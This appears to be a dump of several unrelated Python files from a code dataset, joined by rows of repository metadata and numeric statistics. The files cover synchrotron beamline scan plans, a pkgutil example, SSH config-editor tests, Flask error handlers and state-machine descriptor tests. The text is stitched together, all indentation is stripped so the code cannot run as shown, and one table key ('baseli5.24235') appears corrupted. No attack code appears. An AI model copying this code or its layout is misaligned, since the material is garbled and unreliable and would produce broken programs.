yield from mv(feslt.vc,0.8-0.2*i)
for j in range(0, 9):
yield from mv(feslt.hc,0.8-0.2*j)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
yield from mv(feslt.hc,0.5)
yield from mv(feslt.vc,0.738)
yield from mv(epu1.gap,41.3)
# Check Vertical Gap
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
for i in range(0, 14):
yield from mv(feslt.vg,1.5-0.1*i)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
# Check Horizontal Gap
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
for i in range(0, 14):
yield from mv(feslt.hg,1.5-0.1*i)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
def epu_calib_gs_phase_pm28p5_0mm_new():
d=[qem07]
#Using Gas Cell Grid as detector
yield from mv(gc_diag,-95.4)
#################
# Phase -28.5mm #
#################
yield from mv(epu1.phase, -28.5)
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
#1st Harmonic at 320 eV
yield from mv(pgm.en,320,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,30)
yield from mv(epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,50)
#1st Harmonic
for i in range(350,401,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-1.4-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,3,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
for i in range(450,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
yield from sleep(100)
#3rd Harmonic
for i in range(1000,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-0.5-8-(i-1000)*0.0027)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
#################
# Phase 0.0 mm #
#################
yield from mv(epu1.phase, 0)
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
#160 eV
yield from mv(pgm.en,160,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,75)
yield from mv(pgm.en,160,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,75)
for i in range(200,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
yield from sleep(100)
#600-1550 eV, 3rd harmonic
for i in range(600,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-2)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,4,40)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
#################
# Phase 28.5mm #
#################
yield from mv(epu1.phase, 28.5)
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
#1st Harmonic at 320 eV
yield from mv(pgm.en,320,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,30)
yield from mv(epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,50)
#1st Harmonic
for i in range(350,401,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-1.4-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,3,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
for i in range(450,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
yield from sleep(100)
#3rd Harmonic
for i in range(1000,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-0.5-8-(i-1000)*0.0027)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
def epu_calib_gs_phase_0mm_Mar2018():
d=[qem07]
#Using Gas Cell Grid as detector
yield from mv(gc_diag,-95.4)
#################
# Phase 0.0 mm #
#################
yield from mv(epu1.phase, 0)
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
#160 eV
yield from mv(pgm.en,160,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,75)
yield from mv(pgm.en,160,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,75)
for i in range(200,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
yield from sleep(100)
#600-1550 eV, 3rd harmonic
for i in range(600,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-2)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,4,40)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
#def alignM3x():
# # get the exit slit positions to return to at the end
# vg_init = extslt.vg.user_setpoint.value
# hg_init = extslt.hg.user_setpoint.value
# hc_init = extslt.hc.user_setpoint.value
# print('Saving exit slit positions for later')
# # get things out of the way
# yield from m3diag.out
# # read gas cell diode
# yield from gcdiag.grid
# # set detector e.g. gas cell diagnostics qem
# detList=[qem07]
# # set V exit slit value to get enough signal
# yield from mv(extslt.vg, 30)
# # open H slit full open
# yield from mv(extslt.hg, 9000)
# #move extslt.hs appropriately and scan m3.x
# yield from mv(extslt.hc,-9)
# yield from relative_scan(detList,m3.x,-6,6,61)
# yield from mv(extslt.hc,-3)
# yield from relative_scan(detList,m3.x,-6,6,61)
# yield from mv(extslt.hc,3)
# yield from relative_scan(detList,m3.x,-6,6,61)
# print('Returning exit slit positions to the inital values')
# yield from mv(extslt.hc,hc_init)
# yield from mv(extslt.vg, vg_init, extslt.hg, hg_init)
def detectorz():
yield from mv(rixscam.cam.acquire_time,480)
yield from count([rixscam])
f_string = ''
for i in range (0,75,1):
yield from mvr(dc.z,-5)
yield from count([rixscam],md = {'reason':'carbon-tape dc_z scans'})
x_val = db[-1].table('baseli5.24235')['dc_z'][1]
f_string = 'scan no ' + str(db[-1].start['scan_id']) + ': dc_z = ' + str(x_val) + \
' , i = ' + str(i) + '\n'
print(f_string)
yield from mv(shutter_B,'Close')
yield from count([rixscam])
yield from count([rixscam],md = {'reason':'carbon-tape dc_z scans DARK'})
yield from mv(dc.z, 260) # return to nominal value
def detectorvexit():
yield from mv(rixscam.cam.acquire_time,600)
yield from count([rixscam])
f_string = ''
for i in range (0,4,1):
yield from mvr(extslt.vg,-10)
yield from count([rixscam],md = {'reason':'carbon-tape extslt.vg scans'})
x_val = db[-1].table('baseline')['extslt_vg'][1]
f_string = 'scan no ' + str(db[-1].start['scan_id']) + ': extslt_vg = ' + str(x_val) + \
' , i = ' + str(i) + '\n'
print(f_string)
yield from mv(shutter_B,'Close')
yield from count([rixscam])
yield from count([rixscam],md = {'reason':'carbon-tape extslt_vg scans DARK'})
yield from mv(extslt.vg, 50) # return to nominal value
def temp_eq(templimit=1,checktime=5):
deltaT = stemp.temp.B.T.value - stemp.ctrl2.setpoint.value # for control. sample is temp.b.value
i=0
print('Temperature of cryostat equilibrating...\n')
while (abs(deltaT)>templimit):
sys.stdout.write('\r')
sys.stdout.write("\tDeviation of %3.2f K to be within +/- %3.2f K after %d s." % (deltaT,templimit,checktime*i))
sys.stdout.flush()
i=i+1
deltaT = stemp.temp.B.T.value - stemp.ctrl2.setpoint.value
yield from sleep(checktime)
def beam_profile_vs_cryoz():
for i in range(0, 31):
yield from mv(cryo.z,0.1+i*0.1)
yield from sleep(10)
yield from rel_scan([sclr],cryo.y,0,0.08,51)
| 35.007642 | 186 | 0.572286 | 15,191 | 91,615 | 3.323942 | 0.054243 | 0.178595 | 0.123084 | 0.02331 | 0.861568 | 0.833564 | 0.804175 | 0.780073 | 0.759932 | 0.742524 | 0 | 0.079241 | 0.278895 | 91,615 | 2,616 | 187 | 35.021024 | 0.685078 | 0.18545 | 0 | 0.691471 | 0 | 0.005724 | 0.093658 | 0.001532 | 0.000572 | 0 | 0 | 0.001147 | 0 | 1 | 0.042358 | false | 0.001717 | 0.000572 | 0 | 0.042931 | 0.04751 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5225e928e5c0b9f454e82869dae21549249f5c6c | 103 | py | Python | WEEKS/CD_Sata-Structures/_MISC/misc-examples/python3-book-examples/pkgutil/nested/shallow.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/_MISC/misc-examples/python3-book-examples/pkgutil/nested/shallow.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/_MISC/misc-examples/python3-book-examples/pkgutil/nested/shallow.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | #
"""
"""
def func():
print("This func() comes from the installed " "version of nested.shallow")
| 12.875 | 78 | 0.61165 | 13 | 103 | 4.846154 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.203884 | 103 | 7 | 79 | 14.714286 | 0.768293 | 0 | 0 | 0 | 0 | 0 | 0.652632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
870cd64404771971552a20705cddc6ebb3ce3bf6 | 2,471 | py | Python | tests/test_ssh.py | codeghar/config_edit | b4ff42164d9fc011cb2d8466221f393112d89d90 | [
"MIT"
] | null | null | null | tests/test_ssh.py | codeghar/config_edit | b4ff42164d9fc011cb2d8466221f393112d89d90 | [
"MIT"
] | null | null | null | tests/test_ssh.py | codeghar/config_edit | b4ff42164d9fc011cb2d8466221f393112d89d90 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_ssh
----------------------------------
Tests for SSH config files.
"""
import filecmp
import tempfile
import pytest
from config_edit import ssh
contents = """# Comment Here
# -------------------------
Host myhost1
HostName 255.255.255.255
Port 22
User user-login
AddressFamily inet
# CheckHostIP no
# StrictHostKeyChecking no
# UserKnownHostsFile /dev/null
# More Comments
Host myhost2
HostName fd85::fa:11
Port 22
User user-login
AddressFamily inet6
CheckHostIP no
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
"""
def test_ssh_client_config_single_write():
with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
test_file = fh_out.name
fh_out.write(contents)
sshcfg = ssh.ClientConfig(file=test_file)
sshcfg.read()
sshcfg.write()
for f in sshcfg.file_bkps:
assert filecmp.cmp(f, test_file), "File backup {0} does not match contents {1}".format(f, test_file)
def test_ssh_client_config_multiple_writes():
with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
test_file = fh_out.name
fh_out.write(contents)
sshcfg = ssh.ClientConfig(file=test_file)
sshcfg.read()
for i in range(0,5):
sshcfg.write()
for f in sshcfg.file_bkps:
assert filecmp.cmp(f, test_file), "File backup {0} does not match contents {1}".format(f, test_file)
def test_ssh_client_config_multiple_reads():
with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
test_file = fh_out.name
fh_out.write(contents)
sshcfg = ssh.ClientConfig(file=test_file)
for i in range(0,5):
sshcfg.read()
sshcfg.write()
for f in sshcfg.file_bkps:
assert filecmp.cmp(f, test_file), "File backup {0} does not match contents {1}".format(f, test_file)
def test_ssh_client_config_multiple_reads_and_writes():
with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
test_file = fh_out.name
fh_out.write(contents)
sshcfg = ssh.ClientConfig(file=test_file)
for i in range(0,5):
sshcfg.read()
sshcfg.write()
for i in range(0,5):
sshcfg.read()
for i in range(0,5):
sshcfg.write()
for f in sshcfg.file_bkps:
assert filecmp.cmp(f, test_file), "File backup {0} does not match contents {1}".format(f, test_file)
| 23.093458 | 108 | 0.658033 | 347 | 2,471 | 4.524496 | 0.236311 | 0.081529 | 0.04586 | 0.035032 | 0.854777 | 0.840764 | 0.8 | 0.722293 | 0.715924 | 0.715924 | 0 | 0.021683 | 0.216107 | 2,471 | 106 | 109 | 23.311321 | 0.788849 | 0.04654 | 0 | 0.641791 | 0 | 0 | 0.253941 | 0.028547 | 0 | 0 | 0 | 0 | 0.059701 | 1 | 0.059701 | false | 0 | 0.059701 | 0 | 0.119403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5e52593dc2bfc6dc7fab285fd7dce955f819d7e7 | 364 | py | Python | app/main/errors.py | maxnovais/Flapy_Blog | e543faa4c8f99ef3a2cdb1470de507d9cfb330bf | [
"Apache-2.0"
] | null | null | null | app/main/errors.py | maxnovais/Flapy_Blog | e543faa4c8f99ef3a2cdb1470de507d9cfb330bf | [
"Apache-2.0"
] | null | null | null | app/main/errors.py | maxnovais/Flapy_Blog | e543faa4c8f99ef3a2cdb1470de507d9cfb330bf | [
"Apache-2.0"
] | null | null | null | from flask import render_template
from . import main
@main.app_errorhandler(403)
def forbidden(e):
return render_template('main/error/403.html')
@main.app_errorhandler(404)
def page_not_found(e):
return render_template('main/error/404.html')
@main.app_errorhandler(500)
def internal_server_error(e):
return render_template('main/error/500.html')
| 20.222222 | 49 | 0.769231 | 54 | 364 | 4.981481 | 0.407407 | 0.208178 | 0.211896 | 0.234201 | 0.334572 | 0.334572 | 0 | 0 | 0 | 0 | 0 | 0.055728 | 0.112637 | 364 | 17 | 50 | 21.411765 | 0.77709 | 0 | 0 | 0 | 0 | 0 | 0.156593 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.181818 | 0.272727 | 0.727273 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
5e9dce181e62b722015bd4abe1b7e5bb60743d73 | 19,336 | py | Python | Source/Generator/Tests/DescriptorsTests.py | tzijnge/FloHsm | b696500a2d2617f6a4446ff4d911290fd3cf325a | [
"MIT"
] | 5 | 2020-10-26T09:55:36.000Z | 2022-03-08T17:10:32.000Z | Source/Generator/Tests/DescriptorsTests.py | tzijnge/FloHsm | b696500a2d2617f6a4446ff4d911290fd3cf325a | [
"MIT"
] | 7 | 2019-08-11T18:38:31.000Z | 2021-03-04T12:02:47.000Z | Source/Generator/Tests/DescriptorsTests.py | tzijnge/FloHsm | b696500a2d2617f6a4446ff4d911290fd3cf325a | [
"MIT"
] | 1 | 2021-10-04T12:54:07.000Z | 2021-10-04T12:54:07.000Z | import unittest
from Descriptors import State, StateType, InternalTransition, InitialTransition,\
StateTransition, ChoiceTransition, Action, ActionType
from Descriptors import Guard, SimpleGuard, NotGuard, AndGuard, OrGuard, EntryExit
import Helpers
class DescriptorTests(Helpers.FloHsmTester):
def test_cannot_merge_states_with_different_names(self) -> None:
s1 = Helpers.TestState(name='S1')
s2 = Helpers.TestState(name='S2')
self.assertFalse(s1.merge(s2))
def test_merge_states_with_same_name(self) -> None:
s1 = Helpers.TestState(name='S1')
s2 = Helpers.TestState(name='S1')
self.assertTrue(s1.merge(s2))
self.assertState(s1, name='S1')
def test_merge_state_and_choice_pseudo_state_with_same_name(self) -> None:
s1 = Helpers.TestState(name='S1')
s2 = State(name='S1', lineno=0, state_type=StateType.CHOICE)
self.assertTrue(s1.merge(s2))
self.assertState(s1, name='S1', state_type=StateType.CHOICE)
def test_merge_states_with_different_parents(self) -> None:
s1_1 = Helpers.TestState(name='S1', parent='P1')
s1_2 = Helpers.TestState(name='S1', parent='P2')
self.assertFalse(s1_1.merge(s1_2))
s1_1 = Helpers.TestState(name='S1', parent=None)
s1_2 = Helpers.TestState(name='S1', parent='P2')
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', parent='P2')
s1_1 = Helpers.TestState(name='S1', parent='P1')
s1_2 = Helpers.TestState(name='S1', parent=None)
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', parent='P1')
def test_merge_equal_entry_statements(self) -> None:
s1_1 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
s1_2 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
self.assertFalse(s1_1.merge(s1_2))
def test_merge_different_entry_statements(self) -> None:
s1_1 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
s1_2 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A2'), guard=Helpers.TestGuard('G2')))
self.assertFalse(s1_1.merge(s1_2))
def test_merge_entry(self) -> None:
s1_1 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
s1_2 = Helpers.TestState(name='S1')
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', entry_action=Action('A1'), entry_guard='G1')
s1_1 = Helpers.TestState(name='S1')
s1_2 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', entry_action=Action('A1'), entry_guard='G1')
def test_merge_equal_exit_statements(self) -> None:
s1_1 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
s1_2 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
self.assertFalse(s1_1.merge(s1_2))
def test_merge_different_exit_statements(self) -> None:
s1_1 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
s1_2 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A2'), guard=Helpers.TestGuard('G2')))
self.assertFalse(s1_1.merge(s1_2))
def test_merge_exit(self) -> None:
s1_1 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
s1_2 = Helpers.TestState(name='S1')
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', exit_action=Action('A1'), exit_guard='G1')
s1_1 = Helpers.TestState(name='S1')
s1_2 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', exit_action=Action('A1'), exit_guard='G1')
def test_merge_internal_transitions_with_empty_list(self) -> None:
s1_1 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
s1_2 = Helpers.TestState(name='S1')
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', num_int_transitions=1)
self.assertInternalTransition(s1_1.internal_transitions[0], event='E1', action=Action('A1'))
s1_1 = Helpers.TestState(name='S1')
s1_2 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', num_int_transitions=1)
self.assertInternalTransition(s1_1.internal_transitions[0], event='E1', action=Action('A1'))
def test_merge_internal_transitions_from_two_states(self) -> None:
s1_1 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
s1_2 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', num_int_transitions=2)
self.assertInternalTransition(s1_1.internal_transitions[0], event='E1', action=Action('A1'))
self.assertInternalTransition(s1_1.internal_transitions[1], event='E1', action=Action('A1'))
s1_1 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
s1_2 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E2', action=Action('A1'))])
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', num_int_transitions=2)
self.assertInternalTransition(s1_1.internal_transitions[0], event='E1', action=Action('A1'))
self.assertInternalTransition(s1_1.internal_transitions[1], event='E2', action=Action('A1'))
def test_merge_state_transitions_with_empty_list(self) -> None:
s1_1 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
s1_2 = Helpers.TestState(name='S1')
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', num_state_transitions=1)
self.assertStateTransition(s1_1.state_transitions[0], to='S2', event='E1')
s1_1 = Helpers.TestState(name='S1')
s1_2 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', num_state_transitions=1)
self.assertStateTransition(s1_1.state_transitions[0], to='S2', event='E1')
def test_merge_state_transitions_from_two_states(self) -> None:
s1_1 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
s1_2 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', num_state_transitions=2)
self.assertStateTransition(s1_1.state_transitions[0], to='S2', event='E1')
self.assertStateTransition(s1_1.state_transitions[1], to='S2', event='E1')
s1_1 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
s1_2 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S3', event='E2')])
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', num_state_transitions=2)
self.assertStateTransition(s1_1.state_transitions[0], to='S2', event='E1')
self.assertStateTransition(s1_1.state_transitions[1], to='S3', event='E2')
def test_merge_choice_transition(self) -> None:
s1_1 = Helpers.TestState(name='Choice', choice_transitions=[ChoiceTransition('S2', Helpers.TestGuard('G1'))])
s1_2 = Helpers.TestState(name='Choice', choice_transitions=[ChoiceTransition('S3', Helpers.TestGuard('G2'))])
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='Choice', num_choice_transitions=2)
self.assertChoiceTransition(s1_1.choice_transitions[0], to='S2', guard='G1')
self.assertChoiceTransition(s1_1.choice_transitions[1], to='S3', guard='G2')
def test_merge_equal_composite_statements(self) -> None:
s1_1 = Helpers.TestState(name='S1', is_composite=True)
s1_2 = Helpers.TestState(name='S1', is_composite=True)
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', is_composite=True)
s1_1 = Helpers.TestState(name='S1', is_composite=False)
s1_2 = Helpers.TestState(name='S1', is_composite=False)
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', is_composite=False)
def test_merge_different_composite_statements(self) -> None:
s1_1 = Helpers.TestState(name='S1', is_composite=True)
s1_2 = Helpers.TestState(name='S1', is_composite=False)
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', is_composite=True)
s1_1 = Helpers.TestState(name='S1', is_composite=False)
s1_2 = Helpers.TestState(name='S1', is_composite=True)
self.assertTrue(s1_1.merge(s1_2))
self.assertState(s1_1, name='S1', is_composite=True)
def test_merge_line_numbers_from_two_states(self) -> None:
s1_1 = Helpers.TestState(name='S1', lineno=1)
s1_2 = Helpers.TestState(name='S1', lineno=2)
self.assertTrue(s1_1.merge(s1_2))
self.assertEqual(s1_1.name, 'S1')
self.assertEqual(s1_1.lineno, [1, 2])
def test_merge_initial_transition(self) -> None:
s1_1 = Helpers.TestState(name='S1', lineno=1, initial_transition=InitialTransition(toState='S2'))
s1_2 = Helpers.TestState(name='S1', lineno=2)
self.assertTrue(s1_1.merge(s1_2))
self.assertEqual(s1_1.name, 'S1')
self.assertEqual(s1_1.lineno, [1, 2])
self.assertInitialTransition(s1_1.initial_transition, to='S2')
s2_1 = Helpers.TestState(name='S2', lineno=1)
s2_2 = Helpers.TestState(name='S2', lineno=2, initial_transition=InitialTransition(toState='S3', action=Action('A1')))
self.assertTrue(s2_1.merge(s2_2))
self.assertEqual(s2_1.name, 'S2')
self.assertEqual(s2_1.lineno, [1, 2])
self.assertInitialTransition(s2_1.initial_transition, to='S3', action=Action('A1'))
def test_merge_two_initial_transitions_is_not_possible(self) -> None:
s1_1 = Helpers.TestState(name='S1', lineno=1, initial_transition=InitialTransition(toState='S2'))
s1_2 = Helpers.TestState(name='S1', lineno=2, initial_transition=InitialTransition(toState='S3'))
self.assertFalse(s1_1.merge(s1_2))
def test_simple_guard(self) -> None:
g = SimpleGuard('G1', 0)
self.assertEqual('G1', g.to_string())
self.assertEqual(1, len(g.guard_conditions()))
self.assertIn('G1', g.guard_conditions())
def test_not_guard(self) -> None:
g = NotGuard(Helpers.TestGuard('G1'))
self.assertEqual('!G1', g.to_string())
self.assertEqual(1, len(g.guard_conditions()))
self.assertIn('G1', g.guard_conditions())
def test_simplify_not_guard_1(self) -> None:
g = NotGuard(NotGuard(Helpers.TestGuard('G1')))
self.assertEqual('G1', g.to_string())
self.assertEqual(1, len(g.guard_conditions()))
self.assertIn('G1', g.guard_conditions())
def test_simplify_not_guard_2(self) -> None:
g = NotGuard(NotGuard(NotGuard(Helpers.TestGuard('G1'))))
self.assertEqual('!G1', g.to_string())
self.assertEqual(1, len(g.guard_conditions()))
self.assertIn('G1', g.guard_conditions())
def test_and_guard(self) -> None:
g = AndGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G2'))
self.assertEqual('(G1 && G2)', g.to_string())
self.assertEqual(2, len(g.guard_conditions()))
self.assertIn('G1', g.guard_conditions())
self.assertIn('G2', g.guard_conditions())
def test_or_guard(self) -> None:
g = OrGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G2'))
self.assertEqual('(G1 || G2)', g.to_string())
self.assertEqual(2, len(g.guard_conditions()))
self.assertIn('G1', g.guard_conditions())
self.assertIn('G2', g.guard_conditions())
def test_complex_guard(self) -> None:
g = OrGuard(Helpers.TestGuard('G1'), NotGuard(AndGuard(OrGuard(Helpers.TestGuard('G2'), Helpers.TestGuard('G3')), NotGuard(Helpers.TestGuard('G4')))))
self.assertEqual('(G1 || !((G2 || G3) && !G4))', g.to_string())
self.assertEqual(4, len(g.guard_conditions()))
self.assertIn('G1', g.guard_conditions())
self.assertIn('G2', g.guard_conditions())
self.assertIn('G3', g.guard_conditions())
self.assertIn('G4', g.guard_conditions())
def test_guards_can_appear_in_complex_expression_more_than_once(self) -> None:
g = OrGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G1'))
self.assertEqual('(G1 || G1)', g.to_string())
self.assertEqual(1, len(g.guard_conditions()))
self.assertIn('G1', g.guard_conditions())
def test_evaluate_simple_guard(self) -> None:
g = SimpleGuard('G1', 0)
self.assertFalse(g.evaluate(0))
self.assertTrue(g.evaluate(1))
def test_evaluate_not_guard(self) -> None:
g = NotGuard(Helpers.TestGuard('G1'))
self.assertTrue(g.evaluate(0))
self.assertFalse(g.evaluate(1))
